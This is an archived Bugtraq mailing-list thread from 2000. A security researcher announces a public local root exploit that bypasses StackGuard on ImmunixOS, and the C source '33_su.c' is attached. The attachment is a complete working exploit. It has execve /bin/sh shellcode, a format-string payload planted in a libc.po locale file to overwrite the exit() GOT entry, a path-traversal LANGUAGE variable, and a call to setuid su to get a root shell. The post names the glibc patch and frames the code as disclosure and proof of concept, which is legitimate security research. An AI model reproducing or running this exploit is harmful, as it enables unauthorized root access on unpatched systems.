5491280 2000-09-20 08:54 /35 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12871> Kommentar till text 5444805 av Brevbäraren (som är implementerad i) Python Ärende: glibc/locale sploit for ImmunixOS ------------------------------------------------------------ I just developed the first publicly known sploit that bypases StackGuard protection in real world. I decided to publish it as the patch for glibc ImmunixOS is out. It's also the proof of concept described about year ago in our (my and Bulba's) Phrack article published in May this year. [http://phrack.infonexus.com/search.phtml?view&article=p56-5] The sploit is as simple as possible, it does not take any arguments and produces shell with euid==0. All addresses are fixed (stack and env). The exploiting string overwrites exit() GOT entry and makes it point to our shellcode (it's sufficient if the stack is executable) just like we described it in phrack article long time ago :) The exploit won't work if glibc is patched (ImmunixOS patched glibc can be found at: http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/ glibc-2.1.3-21_StackGuard.i386.rpm glibc-devel-2.1.3-21_StackGuard.i386.rpm glibc-profile-2.1.3-21_StackGuard.i386.rpm nscd-2.1.3-21_StackGuard.i386.rpm). I would like to remind that by using StackGuarded binaries you're still adding extra security level that can be bypassed ONLY under certain circumstances! Greetings go to all best Polish security specialists! Regards, -- Mariusz Wo³oszyn Internet Security Specialist, Internet Partners, GTS Poland (5491280) ------------------------------------------(Ombruten) Kommentar i text 5491281 av Brevbäraren (som är implementerad i) Python 5491281 2000-09-20 08:54 /83 rader/ Brevbäraren (som är implementerad i) Python Mottagare: Bugtraq (import) <12872> Kommentar till text 5491280 av Brevbäraren (som är implementerad i) Python Ärende: Bilaga (33_su.c) till: glibc/locale sploit for ImmunixOS ------------------------------------------------------------ /* 33_su.c exploit for LC glibc format string bug it works on StackGuarded version of RH 6.2 called ImmunixOS (http://www.immunix.org/) Exploit (c)Lam3rZ Group by Kil3r of Lam3rZ it's the first public sploit that bypases StackGuard protection in real world it is also a proof of concept described long time ago in Lam3rZ's Phrack article "BYPASSING STACKGUARD AND STACKSHIELD" by Bulba and Kil3r [http://phrack.infonexus.com/search.phtml?view&article=p56-5] greetz: warning3, scut, stealth, bulba, tmoggie, nises, wasik (aka synek ;), and teso team, LSD team, HERT, padnieta babcia, z33d, lcamtuf aka postawflaszke, clubbing.pl, Lucek Skajuoker (wracaj do zdrowia!). Special greets go to Crispin Cowan Disclaimer: THIS is Lam3rZ style (famouce one). Lam3rz style DO NOT exploit bash, do not use bash and does nothing to do with bash scripts! Lam3rZ sploits do not like to take any arguments it confuses lamers! qwertz ? zes ! */ // lamer: // compile it as a regular user on a box and it should work! :) // lam3r: // read the code carefully and have a fun! :) #include <stdio.h> #define EXIT_GOT 0x804c624 #define WHERESHELLCODE 0xbfffff81 #define ENV "LANGUAGE=fi_FI/../../../../../../tmp" #define PATH "/tmp/LC_MESSAGES" char *env[11]; char code[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char hacker[]="\x24\xc6\x04\x08\x89\x89\x89\x89\x25\xc6\x04\x08\x89\x89\x89\x89\x26\xc6\x04\x08\x89\x89\x89\x89\x27\xc6\x04\x08\x44\x44\x44"; main () { char buf[1024]; FILE *fp; if(mkdir(PATH,0755) < 0) { perror("mkdir"); } chdir(PATH); if( !(fp = fopen("libc.po", "w+"))) { perror("fopen"); exit(1); } strcpy(buf,"%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%dAAAA%226d%hn%126d%hn%256d%hn%192d%hn"); fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n"); fprintf(fp,"msgstr \"%s\\n\"", buf); fclose(fp); system("/usr/bin/msgfmt libc.po -o libc.mo"); env[1]=ENV; env[0]=code; env[2]=hacker; env[3]=NULL; printf("ZAJEBI¦CIE!!!\nA teraz bêdziesz le¿a³ i tañczy³ r±czk±!\n"); execle("/bin/su","su","-u", NULL,env); } (5491281) ------------------------------------------(Ombruten)